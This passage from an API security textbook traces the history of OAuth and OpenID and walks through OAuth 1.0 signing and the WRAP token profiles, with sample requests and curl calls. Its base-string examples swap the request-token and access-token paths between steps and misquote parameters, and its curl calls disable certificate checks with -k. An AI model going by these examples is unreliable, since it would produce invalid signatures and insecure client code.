OpenID. Blaine and Larry, together with Chris Messina, DeWitt Clinton, and Eran Hammer, started a discussion group in April 2007 to Figure A-7. Yahoo! BBAuth Appendix A The evoluTion of idenTiTy delegATion 329 build a standardized access delegation protocol—which later became OAuth. The access delegation model proposed in OAuth 1.0 wasn’t drastically different from what Google, Yahoo!, and Flickr already had. Note openid is a standard developed by the openid foundation for decentralized single sign-on. The openid 2.0 final specification is available at http://openid. net/specs/openid-authentication-2_0.html. The OAuth 1.0 core specification was released in December 2007. Later, in 2008, during the 73rd Internet Engineering Task Force (IETF) meeting, a decision was made to develop OAuth under the IETF. It took some time to be established in the IETF, and OAuth 1.0a was released as a community specification in June 2009 to fix a security issue related to a session fixation attack.1 In April 2010, OAuth 1.0 was released as RFC 5849 under the IETF. Note The oAuth 1.0 community specification is available at http://oauth. net/core/1.0/, and oAuth 1.0a is at http://oauth.net/core/1.0a/. Appendix B explains oAuth 1.0 in detail. In November 2009, during the Internet Identity Workshop (IIW), Dick Hardt of Microsoft, Brian Eaton of Google, and Allen Tom of Yahoo! presented a new draft specification for access delegation. It was called Web Resource Authorization Profiles (WRAP), and it was built on top of the OAuth 1.0 model to address some of its limitations. In December 2009, WRAP was deprecated in favor of OAuth 2.0. Note The WRAp specification contributed to the ieTf oAuth working group is available at http://tools.ietf.org/html/draft-hardt-oauth-01. While OAuth was being developed under the OAuth community and the IETF working group, the OpenID community also began to discuss a model to integrate OAuth with OpenID. This effort, initiated in 2009, was called OpenID/OAuth hybrid extension 1 Session fixation, www.owasp.org/index.php/Session_fixation Appendix A The evoluTion of idenTiTy delegATion 330 (see Figure A-8). This extension describes how to embed an OAuth approval request into an OpenID authentication request to allow combined user approval. For security reasons, the OAuth access token isn’t returned in the OpenID authentication response. Instead, a mechanism to obtain the access token is provided. Note The finalized specification for openid/oAuth extension is available at http://step2.googlecode.com/svn/spec/openid_oauth_extension/ latest/openid_oauth_extension.html. Figure A-8. The evolution of identity protocols from OpenID to OpenID Connect OAuth 1.0 provided a good foundation for access delegation. However, criticism arose against OAuth 1.0, mainly targeting its usability and extensibility. As a result, OAuth 2.0 was developed as an authorization framework, rather than a standard protocol. OAuth 2.0 became the RFC 6749 in October 2012 under the IETF. Appendix A The evoluTion of idenTiTy delegATion 331 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_17 APPENDIX B OAuth 1.0 OAuth 1.0 was the first step toward the standardization of identity delegation. OAuth involves three parties in an identity delegation transaction. The delegator, also known as the user, assigns access to his or her resources to a third party. The delegate, also known as the consumer, accesses a resource on behalf of its user. The application that hosts the actual resource is known as the service provider. This terminology was introduced in the first release of the OAuth 1.0 specification under oauth.net. It changed a bit when the OAuth specification was brought into the IETF working group. In OAuth 1.0, RFC 5849, the user (delegator) is known as the resource owner, the consumer (delegate) is known as the client, and the service provider is known as the server. Note The OAuth 1.0 community specification is available at http://oauth. net/core/1.0/, and OAuth 1.0a is at http://oauth.net/core/1.0a/. OAuth 1.0, RFC 5849, made OAuth 1.0 (community version) and 1.0a obsolete. RFC 5849 is available at http://tools.ietf.org/html/rfc5849. The Token Dance Token-based authentication goes back to 1994, when the Mosaic Netscape 0.9 beta version added support for cookies. For the first time, cookies were used to identify whether the same user was revisiting a given web site. Even though it’s not a strong form of authentication, this was the first time in history that a cookie was used for identification. Later, most browsers added support for cookies and started using them as a form of authentication. To log in to a web site, the user gives his or her username and password. Once the user is successfully authenticated, the web server creates a session for that user, and the session identifier is written into a cookie. To reuse the already 332 authenticated session for each request from then onward, the user must attach the cookie. This is the most widely used form of token-based authentication. Note RFC 6265 defines the cookie specification in the context of HTTP: see http://tools.ietf.org/html/rfc6265. Figure B-1. OAuth 1.0 token dance Token: A unique identifier issued by the server and used by the client to associate authenticated requests with the resource owner whose authoriza- tion is requested or has been obtained by the client. Tokens have a matching shared-secret that is used by the client to establish its ownership of the token, and its authority to represent the resource owner. —OAuth 1.0 RFC 5849 APPendix B OAuTH 1.0 333 This appendix helps you digest the formal definition given for token by RFC 5849. OAuth uses tokens at different phases in its protocol flow (see Figure B-1). Three main phases are defined in the OAuth 1.0 handshake: the temporary-credential request phase, the resource-owner authorization phase, and the token-credential request phase. Note All three phases in the OAuth 1.0 token dance must happen over Transport Layer Security (TLS). These are bearer tokens, so anyone who steals them can use them. A bearer token is like cash. if you steal 10 bucks from someone, you can still use it at a Starbucks to buy a coffee, and the cashier will not question whether you own or how you earned that 10 bucks. Temporary-Credential Request Phase During the temporary-credential request phase, the OAuth client sends an HTTP POST to the temporary-credential request endpoint hosted in the resource server: POST /oauth/request-token HTTP/1.1 Host: server.com Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds", oauth_signature_method="HMAC-SHA1", oauth_callback="http://client.net/client_cb", oauth_signature="dsDSdsdsdsdddsdsdsd" The authorization header in the request is constructed with the following parameters: • OAuth: The keyword used to identify the type of the authorization header. It must have the value OAuth. • realm: An identifier known to the resource server. Looking at the realm value, the resource server can find out how to authenticate the OAuth client. The value of realm here serves the same purpose as in HTTP Basic authentication, which we discuss in Appendix F. APPendix B OAuTH 1.0 334 • oauth_consumer_key: A unique identifier issued to the OAuth client by the resource server. This key is associated with a secret key that is known both to the client and to the resource server. • oauth_signature_method: The method used to generate the oauth_signature. This can be PLAINTEXT, HMAC-SHA1, or RSA-SHA1. PLAINTEXT means no signature, HMAC-SHA1 means a shared key has been used for the signature, and RSA-SHA1 means an RSA private key has been used for the signature. The OAuth specification doesn’t mandate any signature method. The resource server can enforce any signature method, based on its requirements. • oauth_signature: The signature, which is calculated according to the method defined in oauth_signature_method. Note With PLAINTEXT as the oauth_signature_method, the oauth_signature is the consumer secret followed by &. For example, if the consumer secret associated with the corresponding consumer_key is Ddedkljlj878dskjds, then the value of oauth_signature is Ddedkljlj878dskjds&. • oauth_callback: An absolute URI that is under the control of the client. In the next phase, once the resource owner has authorized the access request, the resource server has to redirect the resource owner back to the oauth_callback URI. If this is preestablished between the client and the resource server, the value of oauth_callback should be set to oob to indicate that it is out of band. The temporary-credential request authenticates the client. The client must be a registered entity at the resource server. The client registration process is outside the scope of the OAuth specification. The temporary-credential request is a direct HTTP POST from the client to the resource server, and the user isn’t aware of this phase. The client gets the following in response to the temporary-credential request. Both the temporary-credential request and the response must be over TLS: APPendix B OAuTH 1.0 335 HTTP/1.1 200 OK Content-Type: application/x-www-form-urlencoded oauth_token=bhgdjgdds& oauth_token_secret=dsdasdasdse& oauth_callback_confirmed=true Let’s examine the definition of each parameter: • oauth_token: An identifier generated by the resource server. This is used to identify the value of the oauth_token_secret in future requests made by the client to the resource server. This identifier links the oauth_token_secret to the oauth_consumer_key. • oauth_token_secret: A shared secret generated by the resource server. The client will use this in the future requests to generate the oauth_signature. • oauth_callback_confirmed: This must be present and set to true. It helps the client to confirm that the resource server received the oauth_callback sent in the request. To initiate the temporary-credential request phase, the client must first be registered with the resource server and have a consumer key/consumer secret pair. At the end of this phase, the client will have an oauth_token and an oauth_token_secret. Resource-Owner Authorization Phase During the resource-owner authorization phase, the client must get the oauth_token received in the previous phase authorized by the user or the resource owner. The client redirects the user to the resource server with the following HTTP GET request. The oauth_token received in the previous phase is added as a query parameter. Once the request hits the resource server, the resource server knows the client corresponding to the provided token and displays the name of the client to the user on its login page. The user must authenticate first and then authorize the token: GET /authorize_token?oauth_token= bhgdjgdds HTTP/1.1 Host: server.com APPendix B OAuTH 1.0 336 After the resource owner’s approval, the resource server redirects the user to the oauth_callback URL corresponding to the client: GET /client_cb?x=1&oauth_token=dsdsdsdd&oauth_verifier=dsdsdsds HTTP/1.1 Host: client.net Let’s examine the definition of each parameter: • oauth_token: An identifier generated by the resource server. It’s used to identify the value of the oauth_verifier in future requests made by the client to the resource server. This identifier links the oauth_ verifier to the oauth_consumer_key. • oauth_verifier: A shared verification code generated by the resource server. The client will use this in the future requests to generate the oauth_signature. Note if no oauth_callback uRL is registered by the client, the resource server displays a verification code to the resource owner. The resource owner must take it and provide it to the client manually. The process by which the resource owner provides the verification code to the client is outside the scope of the OAuth specification. To initiate the resource-owner authorization phase, the client must have access to the oauth_token and the oauth_token_secret. At the end of this phase, the client has a new oauth_token and an oauth_verifier. Token-Credential Request Phase During the token-credential request phase, the client makes a direct HTTP POST or a GET request to the access token endpoint hosted at the resource server: POST /access_token HTTP/1.1 Host: server.com Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds", oauth_token="bhgdjgdds", APPendix B OAuTH 1.0 337 oauth_signature_method="PLAINTEXT", oauth_verifier="dsdsdsds", oauth_signature="fdfsdfdfdfdfsfffdf" The authorization header in the request is constructed with the following parameters: • OAuth: The keyword used to identify the type of the authorization header. It must have the value OAuth. • realm: An identifier known to the resource server. Looking at the realm value, the resource server can decide how to authenticate the OAuth client. The value of realm here serves the same purpose as in HTTP Basic authentication. • oauth_consumer_key: A unique identifier issued to the OAuth client by the resource server. This key is associated with a secret key that is known to both the client and the resource server. • oauth_signature_method: The method used to generate the oauth_signature. This can be PLAINTEXT, HMAC-SHA1, or RSA-SHA1. PLAINTEXT means no signature, HMAC-SHA1 means a shared key has been used for the signature, and RSA-SHA1 means an RSA private key has been used for the signature. The OAuth specification doesn’t mandate any signature method. The resource server can enforce any signature method, based on its requirements. • oauth_signature: The signature, which is calculated according to the method defined in oauth_signature_method. • oauth_token: The temporary-credential identifier returned in the temporary-credential request phase. • oauth_verifier: The verification code returned in the resource- owner authorization phase. After the resource server validates the access token request, it sends back the following response to the client: HTTP/1.1 200 OK Content-Type: application/x-www-form-urlencoded oauth_token=dsdsdsdsdweoio998s&oauth_token_secret=ioui789kjhk APPendix B OAuTH 1.0 338 Let’s examine the definition of each parameter: • oauth_token: An identifier generated by the resource server. In future requests made by the client, this will be used to identify the value of oauth_token_secret to the resource server. This identifier links oauth_token_secret to the oauth_consumer_key. • oauth_token_secret: A shared secret generated by the resource server. The client will use this in future requests to generate the oauth_signature. To initiate the token-credential request phase, the client must have access to the oauth_token from the first phase and the oauth_verifier from the second phase. At the end of this phase, the client will have a new oauth_token and a new oauth_token_ secret. Invoking a Secured Business API with OAuth 1.0 At the end of the OAuth token dance, the following tokens should be retained at the OAuth client end: • oauth_consumer_key: An identifier generated by the resource server to uniquely identify the client. The client gets the oauth_ consumer_key at the time of registration with the resource server. The registration process is outside the scope of the OAuth specification. • oauth_consumer_secret: A shared secret generated by the resource server. The client will get the oauth_consumer_secret at the time of registration, with the resource server. The registration process is outside the scope of the OAuth specification. The oauth_consumer_ secret is never sent over the wire. • oauth_token: An identifier generated by the resource server at the end of the token-credential request phase. • oauth_token_secret: A shared secret generated by the resource server at the end of the token-credential request phase. APPendix B OAuTH 1.0 339 Following is a sample HTTP request to access a secured API with OAuth 1.0. Here we send an HTTP POST to the student API with one argument called name. In addition to the previously described parameters, it also has oauth_timestamp and oauth_nonce. An API gateway (or any kind of an interceptor) intercepts the request and talks to the token issuer to validate the authorization header. If all looks good, the API gateway routes the request to the business service (behind the API) and then sends back the corresponding response: POST /student?name=pavithra HTTP/1.1 Host: server.com Content-Type: application/x-www-form-urlencoded Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds ", oauth_token="dsdsdsdsdweoio998s", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1474343201", oauth_nonce="rerwerweJHKjhkdsjhkhj", oauth_signature="bYT5CMsGcbgUdFHObYMEfcx6bsw%3D" Let’s examine the definition of the oauth_timestamp and oauth_nonce parameters: • oauth_timestamp: A positive integer that is the number of seconds counted since January 1, 1970, 00:00:00 GMT. • oauth_nonce: A randomly generated unique value added to the request by the client. It’s used to avoid replay attacks. The resource server must reject any request with a nonce that it has seen before. Demystifying oauth_signature Out of the three phases we discussed in the section “The Token Dance,” oauth_ signature is required in two: the temporary-credential request phase and the token- credential request phase. In addition, oauth_signature is required in all client requests to the protected resource or to the secured API. The OAuth specification defines three kinds of signature methods: PLAINTEXT, HMAC-SHA1, and RSA-SHA1. As explained earlier, PLAINTEXT means no signature, HMAC-SHA1 means a shared key has been used for the signature, and RSA- SHA1 means an RSA private key has been used for the signature. APPendix B OAuTH 1.0 340 The OAuth specification doesn’t mandate any signature method. The resource server can enforce a signature method, based on its requirements. The challenge in each signature method is how to generate the base string to sign. Let’s start with the simplest case, PLAINTEXT (see Table B-1). Table B-1. Signature Calculation with the PLAINTEXT Signature Method Phase oauth_signature Temporary-credential request phase consumer_secret& Token-credential request phase consumer_secret&oauth_token_secret With the PLAINTEXT oauth_signature_method, the oauth_signature is the encoded consumer secret followed by &. For example, if the consumer secret associated with the corresponding consumer_key is Ddedkljlj878dskjds, the value of oauth_signature is Ddedkljlj878dskjds&. In this case, TLS must be used to protect the secret key going over the wire. This calculation of oauth_signature with PLAINTEXT is valid only for the temporary-credential request phase. For the token-credential request phase, oauth_ signature also includes the shared token secret after the encoded consumer secret. For example, if the consumer secret associated with the corresponding consumer_key is Ddedkljlj878dskjds and the value of the shared token secret is ekhjkhkhrure, then the value of oauth_signature is Ddedkljlj878dskjds&ekhjkhkhrure. The shared token secret in this case is the oauth_token_secret returned in the temporary-credential request phase. For both HMAC-SHA1 and RSA-SHA1 signature methods, first you need to generate a base string for signing, which we discuss in the next section. Generating the Base String in Temporary-Credential Request Phase Let’s start with the temporary-credential request phase. The following is a sample OAuth request generated in this phase: POST /oauth/request-token HTTP/1.1 Host: server.com Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds", oauth_signature_method="HMAC-SHA1", APPendix B OAuTH 1.0 341 oauth_callback="http://client.net/client_cb", oauth_signature="dsDSdsdsdsdddsdsdsd" Step 1: Get the uppercase value of the HTTP request header (GET or POST): POST Step 2: Get the value of the scheme and the HTTP host header in lowercase. If the port has a nondefault value, it needs to be included as well: http://server.com Step 3: Get the path and the query components in the request resource URI: /oauth/request-token Step 4: Get all the OAuth protocol parameters, excluding oauth_signature, concatenated by & (no line breaks): oauth_consumer_key="dsdsddDdsdsds"& oauth_signature_method="HMAC-SHA1"& oauth_callback="http://client.net/client_cb" Step 5: Concatenate the outputs from steps 2 and 3: http://server.com/oauth/request-token Step 6: Concatenate the output from steps 5 and 4 with & (no line breaks): http://server.com/oauth/access-token& oauth_consumer_key="dsdsddDdsdsds"& oauth_signature_method="HMAC-SHA1"& oauth_callback="http://client.net/client_cb" Step 7: URL-encode the output from step 6 (no line breaks): http%3A%2F%2Fserver.com%2Foauth%2F access-token&%26%20oauth_consumer_key%3D%22dsdsddDdsdsds%22%26 oauth_signature_method%3D%22HMAC-SHA1%22%26 oauth_callback%3D%22http%3A%2F%2Fclient.net%2Fclient_cb%22 APPendix B OAuTH 1.0 342 Step 8: Concatenate the output from steps 1 and 7 with &. This produces the final base string to calculate the oauth_signature (no line breaks): POST&http%3A%2F%2Fserver.com%2Foauth%2F access-token&%26%20oauth_consumer_key%3D%22dsdsddDdsdsds%22%26 oauth_signature_method%3D%22HMAC-SHA1%22%26 oauth_callback%3D%22http%3A%2F%2Fclient.net%2Fclient_cb%22 Generating the Base String in Token Credential Request Phase Now, let’s see how to calculate the base string in the token-credential request phase. The following is a sample OAuth request generated in this phase: POST /access_token HTTP/1.1 Host: server.com Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds", oauth_token="bhgdjgdds", oauth_signature_method="HMAC-SHA1", oauth_verifier="dsdsdsds", oauth_signature="fdfsdfdfdfdfsfffdf" Step 1: Get the uppercase value of the HTTP request header (GET or POST): POST Step 2: Get the value of the scheme and the HTTP host header in lowercase. If the port has a nondefault value, it needs to be included as well: http://server.com Step 3: Get the path and the query components in the request resource URI: /oauth/access-token Step 4: Get all the OAuth protocol parameters, excluding oauth_signature, concatenated by & (no line breaks): oauth_consumer_key="dsdsddDdsdsds"& oauth_token="bhgdjgdds"& APPendix B OAuTH 1.0 343 oauth_signature_method="HMAC-SHA1"& oauth_verifier="dsdsdsds" Step 5: Concatenate the output from steps 2 and 3: http://server.com/oauth/access-token Step 6: Concatenate the output from steps 5 and 4 with & (no line breaks): http://server.com/oauth/request-token& oauth_consumer_key="dsdsddDdsdsds"& oauth_token="bhgdjgdds"& oauth_signature_method="HMAC-SHA1"& oauth_verifier="dsdsdsds" Step 7: URL-encode the output from step 6 (no line breaks): http%3A%2F%2Fserver.com%2Foauth%2F request-token%26oauth_consumer_key%3D%22dsdsddDdsdsds%22%26 oauth_token%3D%22%20bhgdjgdds%22%26 oauth_signature_method%3D%22HMAC-SHA1%22%26 oauth_verifier%3D%22%20dsdsdsds%22%20 Step 8: Concatenate the output from steps 1 and 7 with &. This produces the final base string to calculate the oauth_signature (no line breaks): POST&http%3A%2F%2Fserver.com%2Foauth%2F request-token%26oauth_consumer_key%3D%22dsdsddDdsdsds%22%26 oauth_token%3D%22%20bhgdjgdds%22%26 oauth_signature_method%3D%22HMAC-SHA1%22%26 oauth_verifier%3D%22%20dsdsdsds%22%20 Building the Signature Once you’ve calculated the base string for each phase, the next step is to build the signature based on the signature method. For the temporary-credential request phase, if you use HMAC-SHA1 as the signature method, the signature is derived in the following manner: oauth_signature= HMAC-SHA1(key, text) oauth_signature= HMAC-SHA1(consumer_secret&, base-string) APPendix B OAuTH 1.0 344 For the token-credential request phase, the key also includes the shared token secret after the consumer secret. For example, if the consumer secret associated with the corresponding consumer_key is Ddedkljlj878dskjds and the value of the shared token secret is ekhjkhkhrure, then the value of the key is Ddedkljlj878dskjds&ekhjkh khrure. The shared token secret in this case is the oauth_token_secret returned in the temporary-credential request phase: oauth_signature= HMAC-SHA1(consumer_secret&oauth_token_secret, base- string) In either phase, if you want to use RSA-SHA1 as the oauth_signature_method, the OAuth client must register an RSA public key corresponding to its consumer key, at the resource server. For RSA-SHA1, you calculate the signature in the following manner, regardless of the phase: oauth_signature= RSA-SHA1(RSA private key, base-string) Generating the Base String in an API Call In addition to the token dance, you also need to build the oauth_signature in each business API invocation. In the following sample request, the OAuth client invokes the student API with a query parameter. Let’s see how to calculate the base string in this case: POST /student?name=pavithra HTTP/1.1 Host: server.com Content-Type: application/x-www-form-urlencoded Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds ", oauth_token="dsdsdsdsdweoio998s", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1474343201", oauth_nonce="rerwerweJHKjhkdsjhkhj", oauth_signature="bYT5CMsGcbgUdFHObYMEfcx6bsw%3D" Step 1: Get the uppercase value of the HTTP request header (GET or POST): POST APPendix B OAuTH 1.0 345 Step 2: Get the value of the scheme and the HTTP host header in lowercase. If the port has a nondefault value, it needs to be included as well: http://server.com Step 3: Get the path and the query components in the request resource URI: /student?name=pavithra Step 4: Get all the OAuth protocol parameters, excluding oauth_signature, concatenated by & (no line breaks): oauth_consumer_key="dsdsddDdsdsds"& oauth_token="dsdsdsdsdweoio998s"& oauth_signature_method="HMAC-SHA1"& oauth_timestamp="1474343201"& oauth_nonce="rerwerweJHKjhkdsjhkhj" Step 5: Concatenate the output from steps 2 and 3 (no line breaks): http://server.com/student?name=pavithra Step 6: Concatenate the output from steps 5 and 4 with & (no line breaks): http://server.com/student?name=pavithra& oauth_consumer_key="dsdsddDdsdsds"& oauth_token="dsdsdsdsdweoio998s"& oauth_signature_method="HMAC-SHA1"& oauth_timestamp="1474343201"& oauth_nonce="rerwerweJHKjhkdsjhkhj" Step 7: URL-encode the output from step 6 (no line breaks): http%3A%2F%2Fserver.com%2Fstudent%3Fname%3Dpavithra%26 oauth_consumer_key%3D%22dsdsddDdsdsds%20%22%26 oauth_token%3D%22dsdsdsdsdweoio998s%22%26 oauth_signature_method%3D%22HMAC-SHA1%22%26 oauth_timestamp%3D%221474343201%22%26 oauth_nonce%3D%22rerwerweJHKjhkdsjhkhj%22 APPendix B OAuTH 1.0 346 Step 8: Concatenate the output from steps 1 and 7 with &. This produces the final base string to calculate the oauth_signature (no line breaks): POST& http%3A%2F%2Fserver.com%2Fstudent%3Fname%3Dpavithra%26 oauth_consumer_key%3D%22dsdsddDdsdsds%20%22%26 oauth_token%3D%22dsdsdsdsdweoio998s%22%26 oauth_signature_method%3D%22HMAC-SHA1%22%26 oauth_timestamp%3D%221474343201%22%26 oauth_nonce%3D%22rerwerweJHKjhkdsjhkhj%22 Once you have the base string, the OAuth signature is calculated in the following manner with the HMAC-SHA1 and RSA-SHA1 signature methods. The value of oauth_ token_secret is from the token-credential request phase: oauth_signature= HMAC-SHA1(consumer_secret&oauth_token_secret, base- string) oauth_signature= RSA-SHA1(RSA private key, base-string) Three-Legged OAuth vs. Two-Legged OAuth The OAuth flow discussed so far involves three parties: the resource owner, the client, and the resource server. The client accesses a resource hosted in the resource server on behalf of the resource owner. This is the most common pattern in OAuth, and it’s also known as three-legged OAuth (three parties involved). In two-legged OAuth, you have only two parties: the client becomes the resource owner. There is no access delegation in two-legged OAuth. Note Two-legged OAuth never made it to the ieTF. The initial draft specification is available at http://oauth.googlecode.com/svn/spec/ext/consumer_ request/1.0/drafts/2/spec.html. If the same student API discussed earlier is secured with two-legged OAuth, the request from the client looks like the following. The value of oauth_token is an empty string. There is no token dance in two-legged OAuth. You only need oauth_consumer_ key and consumer_secret. The HMAC-SHA1 signature is generated using consumer_ secret as the key: APPendix B OAuTH 1.0 347 POST /student?name=pavithra HTTP/1.1 Host: server.com Content-Type: application/x-www-form-urlencoded Authorization: OAuth realm="simple", oauth_consumer_key="dsdsddDdsdsds ", oauth_token="", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1474343201", oauth_nonce="rerwerweJHKjhkdsjhkhj", oauth_signature="bYT5CMsGcbgUdFHObYMEfcx6bsw%3D" Note in both HTTP Basic authentication and two-legged OAuth, the resource owner acts as the client and directly invokes the APi. With HTTP Basic authentication, you pass the credentials over the wire; this must be over TLS. With two-legged OAuth, you never pass the consumer_secret over the wire, so it need not be on TLS. HTTP digest authentication looks very similar to two-legged OAuth. in both cases, you never pass credentials over the wire. The difference is that HTTP digest authentication authenticates the user, whereas two-legged OAuth authenticates the application on behalf of the resource owner. A given resource owner can own multiple applications, and each application can have its own consumer key and consumer secret. OAuth WRAP In November 2009, a new draft specification for access delegation called Web Resource Authorization Profiles (WRAP) was proposed, built on top of the OAuth 1.0 model. WRAP was later deprecated in favor of OAuth 2.0. APPendix B OAuTH 1.0 348 Note The initial draft of the WRAP profile submitted to the ieTF is available at http://tools.ietf.org/html/draft-hardt-oauth-01. Unlike OAuth 1.0, WRAP didn’t depend on a signature scheme. At a high level, the user experience was the same as in OAuth 1.0, but WRAP introduced a new component into the access delegation flow: the authorization server. Unlike in OAuth 1.0, all the communications with respect to obtaining a token now happens between the client and the authorization server (not with the resource server). The client first redirects the user to the authorization server with its consumer key and the callback URL. Once the user authorized the access rights to the client, the user is redirected back to the callback URL with a verification code. Then the client has to do a direct call to the access token endpoint of the authorization server with the verification code to get the access token. Thereafter, the client only needs to include the access token in all API calls (all API calls must be on TLS): https://friendfeed-api.com/v2/feed/home?wrap_access_token=dsdsdrwerwr Note in november 2009, Facebook joined the Open Web Foundation, together with Microsoft, Google, Yahoo!, and many others, with a commitment to support open standards for web authentication. Keeping that promise, in december 2009, Facebook added OAuth WRAP support to FriendFeed, which it had acquired a few months earlier. OAuth WRAP was one of the initial steps toward OAuth 2.0. WRAP introduced two types of profiles for acquiring an access token: autonomous client profiles and user delegation profiles. In autonomous client profiles, the client becomes the resource owner, or the client is acting on behalf of itself. In other words, the resource owner is the one who accesses the resource. This is equivalent to the two- legged OAuth model in OAuth 1.0. In user delegation profiles, the client acts on behalf of the resource owner. OAuth 1.0 didn’t have this profile concept, and was limited to a single flow. This extensibility introduced by OAuth WRAP later became a key part of OAuth 2.0. APPendix B OAuTH 1.0 349 Client Account and Password Profile The OAuth WRAP specification introduced two autonomous client profiles: the Client Account and Password Profile and the Assertion Profile. The Client Account and Password Profile uses the client’s or the resource owner’s credentials at the authorization server to obtain an access token. This pattern is mostly used for server-to-server authentication where no end user is involved. The following cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with three attributes: wrap_name is the username, wrap_password is the password corresponding to the username, and wrap_scope is the expected level of access required by the client. wrap_scope is an optional parameter: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_name=admin& wrap_password=admin& wrap_scope=read_profile" https://authorization-server/wrap/token This returns wrap_access_token, wrap_refresh_token, and wrap_access_token_ expires_in parameters. wrap_access_token_expires_in is an optional parameter that indicates the lifetime of wrap_access_token in seconds. When wrap_access_token expires, wrap_refresh_token can be used to get a new access token. OAuth WRAP introduced for the first time this token-refreshing functionality. The access token refresh request only needs wrap_refresh_token as a parameter, as shown next, and it returns a new wrap_access_token. It doesn’t return a new wrap_refresh_token. The same wrap_refresh_token obtained in the first access token request can be used to refresh subsequent access tokens: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_refresh_token=Xkjk78iuiuh876jhhkwkjhewew" https://authorization-server/wrap/token APPendix B OAuTH 1.0 350 Assertion Profile The Assertion Profile is another profile introduced by OAuth WRAP that falls under the autonomous client profiles. This assumes that the client somehow obtains an assertion—say, for example, a SAML token—and uses it to acquire a wrap_access_token. The following example cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with three attributes: wrap_assertion_format is the type of the assertion included in the request in a way known to the authorization server, wrap_assertion is the encoded assertion, and wrap_scope is the expected level of access required by the client. wrap_scope is an optional parameter: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_assertion_format=saml20& wrap_assertion=encoded-assertion& wrap_scope=read_profile" https://authorization-server/wrap/token The response is the same as in the Client Account and Password Profile, except that in the Assertion Profile, there is no wrap_refresh_token. Username and Password Profile The WRAP user delegation profiles introduced three profiles: the Username and Password Profile, the Web App Profile, and the Rich App Profile. The Username and Password Profile is mostly recommended for installed trusted applications. The application is the client, and the end user or the resource owner must provide their username and password to the application. Then the application exchanges the username and password for an access token and stores the access token in the application. The following cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with four attributes: wrap_client_id is an identifier for the application, wrap_username is the username of the end user, wrap_password is the APPendix B OAuTH 1.0 351 password corresponding to the username, and wrap_scope is the expected level of access required by the client (wrap_scope is an optional parameter): \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_client_id=app1& wrap_username=admin& wrap_password=admin& wrap_scope=read_profile" https://authorization-server/wrap/token This returns wrap_access_token and wrap_access_token_expires_in parameters. wrap_access_token_expires_in is an optional parameter that indicates the lifetime of wrap_access_token in seconds. If the authorization server detects any malicious access patterns, then instead of sending wrap_access_token to the client application, it returns a wrap_verification_url. It’s the responsibility of the client application to load this URL into the user’s browser or advise them to visit that URL. Once the user has completed that step, the user must indicate to the client application that verification is complete. Then the client application can initiate the token request once again. Instead of sending a verification URL, the authorization server can also enforce a CAPTCHA verification through the client application. There the authorization server sends back a wrap_captcha_url, which points to the location where the client application can load the CAPTCHA. Once it’s loaded and has the response from the end user, the client application must POST it back to the authorization server along with the token request: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_captcha_url=url-encoded-captcha-url& wrap_captch_solution-solution& wrap_client_id=app1& wrap_username=admin& wrap_password=admin& wrap_scope=read_profile" https://authorization-server/wrap/token APPendix B OAuTH 1.0 352 Web App Profile The Web App Profile defined under the WRAP user delegation profiles is mostly recommended for web applications, where the web application must access a resource belonging to an end user on his or her behalf. The web application follows a two-step process to acquire an access token: it gets a verification code from the authorization server and then exchanges that for an access token. The end user must initiate the first step by visiting the client web application. Then the user is redirected to the authorization server. The following example shows how the user is redirected to the authorization server with appropriate WRAP parameters: https://authorization-server/wrap/authorize? wrap_client_id=0rhQErXIX49svVYoXJGt0DWBuFca& wrap_callback=https%3A%2F%2Fmycallback& wrap_client_state=client-state& wrap_scope=read_profile wrap_client_id is an identifier for the client web application. wrap_callback is the URL where the user is redirected after a successful authentication at the authorization server. Both wrap_client_state and wrap_scope are optional parameters. Any value in wrap_client_state must be returned back to the client web application. After the end user’s approval, a wrap_verification_code and other related parameters are returned to the callback URL associated with the client web application as query parameters. The next step is to exchange this verification code to an access token: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_client_id=0rhQErXIX49svVYoXJGt0DWBuFca & wrap_client_secret=weqeKJHjhkhkihjk& wrap_verification_code=dsadkjljljrrer& wrap_callback=https://mycallback" https://authorization-server/wrap/token This cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with four attributes: wrap_client_id is an identifier for the application, wrap_client_secret is the password corresponding to wrap_client_id, wrap_verification_code is the verification code returned in the previous step, and wrap_callback is the callback URL where the verification code was sent. This returns APPendix B OAuTH 1.0 353 wrap_access_token, wrap_refresh_token, and wrap_access_token_expires_in parameters. wrap_access_token_expires_in is an optional parameter that indicates the lifetime of wrap_access_token in seconds. When wrap_access_token expires, wrap_refresh_token can be used to get a new access token. Rich App Profile The Rich App Profile defined under the WRAP user delegation profiles is most commonly used in scenarios where the OAuth client application is an installed application that can also work with a browser. Hybrid mobile apps are the best example. The protocol flow is very similar to that of the Web App Profile. The rich client application follows a two-step process to acquire an access token: it gets a verification code from the authorization server and then exchanges that for an access token. The end user must initiate the first step by visiting the rich client application. Then the application spawns a browser and redirects the user to the authorization server: https://authorization-server/wrap/authorize? wrap_client_id=0rhQErXIX49svVYoXJGt0DWBuFca& wrap_callback=https%3A%2F%2Fmycallback& wrap_client_state=client-state& wrap_scope=read_profile wrap_client_id is an identifier for the rich client application. wrap_callback is the URL where the user is redirected after a successful authentication at the authorization server. Both wrap_client_state and wrap_scope are optional parameters. Any value in wrap_client_state is returned back to the callback URL. After the end user’s approval, a wrap_verification_code is returned to the 